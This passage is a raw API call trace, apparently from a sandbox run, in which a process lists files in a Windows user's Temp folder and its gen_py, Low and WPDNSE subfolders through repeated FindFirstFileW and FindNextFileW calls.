cAlternateFileName="BZ61YH~1.AVI")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9dc99990, ftCreationTime.dwHighDateTime=0x1d7e041, ftLastAccessTime.dwLowDateTime=0xaf2fbf70, ftLastAccessTime.dwHighDateTime=0x1d7e04b, ftLastWriteTime.dwLowDateTime=0xaf2fbf70, ftLastWriteTime.dwHighDateTime=0x1d7e04b, nFileSizeHigh=0x0, nFileSizeLow=0x5d1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPXgpx9 GUyCEVVkku3.ods", cAlternateFileName="EPXGPX~1.ODS")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x852aa500, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852aa500, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b18e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b18e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gen_py", cAlternateFileName="")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfc2d7ad0, ftCreationTime.dwHighDateTime=0x1d7db4e, ftLastAccessTime.dwLowDateTime=0x76a50980, ftLastAccessTime.dwHighDateTime=0x1d7e299, ftLastWriteTime.dwLowDateTime=0x76a50980, ftLastWriteTime.dwHighDateTime=0x1d7e299, nFileSizeHigh=0x0, nFileSizeLow=0x100e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="gUwL6b4bliUpoboFV4m.avi", cAlternateFileName="GUWL6B~1.AVI")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1de8a1b0, ftCreationTime.dwHighDateTime=0x1d7ddf5, ftLastAccessTime.dwLowDateTime=0xca9065e0, ftLastAccessTime.dwHighDateTime=0x1d7df69, ftLastWriteTime.dwLowDateTime=0xca9065e0, ftLastWriteTime.dwHighDateTime=0x1d7df69, nFileSizeHigh=0x0, nFileSizeLow=0x1186d, dwReserved0=0x0, dwReserved1=0x0, cFileName="h2cxtEWm6GDRbxrCDW.ots", cAlternateFileName="H2CXTE~1.OTS")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22b4330, ftCreationTime.dwHighDateTime=0x1d7e394, ftLastAccessTime.dwLowDateTime=0x3e48ad50, ftLastAccessTime.dwHighDateTime=0x1d7e5e9, ftLastWriteTime.dwLowDateTime=0x3e48ad50, ftLastWriteTime.dwHighDateTime=0x1d7e5e9, nFileSizeHigh=0x0, nFileSizeLow=0xeebe, dwReserved0=0x0, dwReserved1=0x0, cFileName="hVRMr.pps", cAlternateFileName="")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad3d2380, ftCreationTime.dwHighDateTime=0x1d7de64, ftLastAccessTime.dwLowDateTime=0xf3658190, ftLastAccessTime.dwHighDateTime=0x1d7df81, ftLastWriteTime.dwLowDateTime=0xf3658190, ftLastWriteTime.dwHighDateTime=0x1d7df81, nFileSizeHigh=0x0, nFileSizeLow=0x4089, dwReserved0=0x0, dwReserved1=0x0, cFileName="ic2fIP37Uc.bmp", cAlternateFileName="IC2FIP~1.BMP")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa06364c0, ftCreationTime.dwHighDateTime=0x1d7de74, ftLastAccessTime.dwLowDateTime=0x1d1b3ab0, ftLastAccessTime.dwHighDateTime=0x1d7e668, ftLastWriteTime.dwLowDateTime=0x1d1b3ab0, ftLastWriteTime.dwHighDateTime=0x1d7e668, nFileSizeHigh=0x0, nFileSizeLow=0x16f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="IK_T8zXKdH7.avi", cAlternateFileName="IK_T8Z~1.AVI")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40344e0, ftCreationTime.dwHighDateTime=0x1d7dc4b, ftLastAccessTime.dwLowDateTime=0x209ef7a0, ftLastAccessTime.dwHighDateTime=0x1d7e783, ftLastWriteTime.dwLowDateTime=0x209ef7a0, ftLastWriteTime.dwHighDateTime=0x1d7e783, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="K40PS9qTtESd.m4a", cAlternateFileName="K40PS9~1.M4A")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x98d35230, ftCreationTime.dwHighDateTime=0x1d7d715, ftLastAccessTime.dwLowDateTime=0x1aca7ad0, ftLastAccessTime.dwHighDateTime=0x1d7e692, ftLastWriteTime.dwLowDateTime=0x1aca7ad0, ftLastWriteTime.dwHighDateTime=0x1d7e692, nFileSizeHigh=0x0, nFileSizeLow=0x11b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="lPjYQx5rZXTSTGkq.mp3", cAlternateFileName="LPJYQX~1.MP3")) returned 1 [0208.302] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9c70, ftCreationTime.dwHighDateTime=0x1d7d977, ftLastAccessTime.dwLowDateTime=0xf531e490, ftLastAccessTime.dwHighDateTime=0x1d7e60d, ftLastWriteTime.dwLowDateTime=0xf531e490, ftLastWriteTime.dwHighDateTime=0x1d7e60d, nFileSizeHigh=0x0, nFileSizeLow=0x108c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="LTdsCoN.swf", cAlternateFileName="")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x514720e0, ftCreationTime.dwHighDateTime=0x1d7d715, ftLastAccessTime.dwLowDateTime=0xcabb3db0, ftLastAccessTime.dwHighDateTime=0x1d7e680, ftLastWriteTime.dwLowDateTime=0xcabb3db0, ftLastWriteTime.dwHighDateTime=0x1d7e680, nFileSizeHigh=0x0, nFileSizeLow=0xa18c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mJqT32qGzny.odt", cAlternateFileName="MJQT32~1.ODT")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55223a0, ftCreationTime.dwHighDateTime=0x1d7e3d2, ftLastAccessTime.dwLowDateTime=0xe181c3f0, ftLastAccessTime.dwHighDateTime=0x1d7e5dd, ftLastWriteTime.dwLowDateTime=0xe181c3f0, ftLastWriteTime.dwHighDateTime=0x1d7e5dd, nFileSizeHigh=0x0, nFileSizeLow=0x2e86, dwReserved0=0x0, dwReserved1=0x0, cFileName="oDeF1kpQ.png", cAlternateFileName="")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88a36fb0, ftCreationTime.dwHighDateTime=0x1d7e630, ftLastAccessTime.dwLowDateTime=0x298f7070, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0x298f7070, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xd368, dwReserved0=0x0, dwReserved1=0x0, cFileName="OGz30.odp", cAlternateFileName="")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302fe690, ftCreationTime.dwHighDateTime=0x1d7dd40, ftLastAccessTime.dwLowDateTime=0x9dbe2ce0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x9dbe2ce0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x753, dwReserved0=0x0, dwReserved1=0x0, cFileName="piQCB9.wav", cAlternateFileName="")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9b348780, ftCreationTime.dwHighDateTime=0x1d7daf6, ftLastAccessTime.dwLowDateTime=0x52ea10, ftLastAccessTime.dwHighDateTime=0x1d7de9b, ftLastWriteTime.dwLowDateTime=0x52ea10, ftLastWriteTime.dwHighDateTime=0x1d7de9b, nFileSizeHigh=0x0, nFileSizeLow=0x8fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rX-N26AiJtM4pl.mp4", cAlternateFileName="RX-N26~1.MP4")) returned 1 [0208.303] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3718c4c0, ftCreationTime.dwHighDateTime=0x1d7d8fb, ftLastAccessTime.dwLowDateTime=0xf2f4a900, ftLastAccessTime.dwHighDateTime=0x1d7e500, ftLastWriteTime.dwLowDateTime=0xf2f4a900, ftLastWriteTime.dwHighDateTime=0x1d7e500, nFileSizeHigh=0x0, nFileSizeLow=0x99e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="sSCoUWdR7Tt.flv", cAlternateFileName="SSCOUW~1.FLV")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x617160f0, ftCreationTime.dwHighDateTime=0x1d7e6ad, ftLastAccessTime.dwLowDateTime=0x8f251050, ftLastAccessTime.dwHighDateTime=0x1d7e6bc, ftLastWriteTime.dwLowDateTime=0x8f251050, ftLastWriteTime.dwHighDateTime=0x1d7e6bc, nFileSizeHigh=0x0, nFileSizeLow=0x10ab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="t6p7D-IBqzDj-ykxbV_.flv", cAlternateFileName="T6P7D-~1.FLV")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8014d770, ftCreationTime.dwHighDateTime=0x1d7e6a9, ftLastAccessTime.dwLowDateTime=0x9c121380, ftLastAccessTime.dwHighDateTime=0x1d7e6ad, ftLastWriteTime.dwLowDateTime=0x9c121380, ftLastWriteTime.dwHighDateTime=0x1d7e6ad, nFileSizeHigh=0x0, nFileSizeLow=0x10443, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tu0bO5LyQ7QXLaK5M.mkv", cAlternateFileName="TU0BO5~1.MKV")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31756630, ftCreationTime.dwHighDateTime=0x1d7e072, ftLastAccessTime.dwLowDateTime=0x4b9723e0, ftLastAccessTime.dwHighDateTime=0x1d7e389, ftLastWriteTime.dwLowDateTime=0x4b9723e0, ftLastWriteTime.dwHighDateTime=0x1d7e389, nFileSizeHigh=0x0, nFileSizeLow=0x18894, dwReserved0=0x0, dwReserved1=0x0, cFileName="U2ASIB99FQmP.gif", cAlternateFileName="U2ASIB~1.GIF")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdeb6a660, ftCreationTime.dwHighDateTime=0x1d7e095, ftLastAccessTime.dwLowDateTime=0x74e2a990, ftLastAccessTime.dwHighDateTime=0x1d7e73a, ftLastWriteTime.dwLowDateTime=0x74e2a990, ftLastWriteTime.dwHighDateTime=0x1d7e73a, nFileSizeHigh=0x0, nFileSizeLow=0x8f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="UjDoq1incW2uP9teg.avi", cAlternateFileName="UJDOQ1~1.AVI")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1c6480, ftCreationTime.dwHighDateTime=0x1d7dddf, ftLastAccessTime.dwLowDateTime=0xfd4ce090, ftLastAccessTime.dwHighDateTime=0x1d7e5ee, ftLastWriteTime.dwLowDateTime=0xfd4ce090, ftLastWriteTime.dwHighDateTime=0x1d7e5ee, nFileSizeHigh=0x0, nFileSizeLow=0x234a, dwReserved0=0x0, dwReserved1=0x0, cFileName="yaaL.avi", cAlternateFileName="")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x523a3390, ftCreationTime.dwHighDateTime=0x1d7d7fe, ftLastAccessTime.dwLowDateTime=0x1dbf930, ftLastAccessTime.dwHighDateTime=0x1d7e47c, ftLastWriteTime.dwLowDateTime=0x1dbf930, ftLastWriteTime.dwHighDateTime=0x1d7e47c, nFileSizeHigh=0x0, nFileSizeLow=0x10a21, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yfj43u.mkv", cAlternateFileName="")) returned 1 [0208.304] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xce825e10, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce825e10, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce825e10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF00EECD0D06F50839.TMP", cAlternateFileName="~DF00E~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xc8e23e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc8e23e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc8e23e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF3B835B1D9CD4A189.TMP", cAlternateFileName="~DF3B8~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce825e10, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce825e10, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce825e10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF4F20DE425F2E5A5B.TMP", cAlternateFileName="~DF4F2~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xc861b3f0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc861b3f0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc861b3f0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF65219CAE9E33589F.TMP", cAlternateFileName="~DF652~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce7ffcb0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce7ffcb0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce7ffcb0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFC8941DD3C516B334.TMP", cAlternateFileName="~DFC89~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xce7ffcb0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce7ffcb0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce7ffcb0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFECBE7153B89C22C3.TMP", cAlternateFileName="~DFECB~1.TMP")) returned 1 [0208.305] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xce7ffcb0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce7ffcb0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce7ffcb0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFECBE7153B89C22C3.TMP", cAlternateFileName="~DFECB~1.TMP")) returned 0 [0208.305] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eca0) returned 1 [0208.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef00) returned 1 [0208.306] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0208.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.306] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0208.306] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b18e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b18e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.307] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b18e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b18e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.307] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b3ef90, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b3ef90, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 1 [0208.307] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b3ef90, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b3ef90, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 0 [0208.308] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.308] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0208.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.308] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0208.309] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.310] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.310] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0208.310] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.310] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0208.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.311] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0208.311] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.312] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, 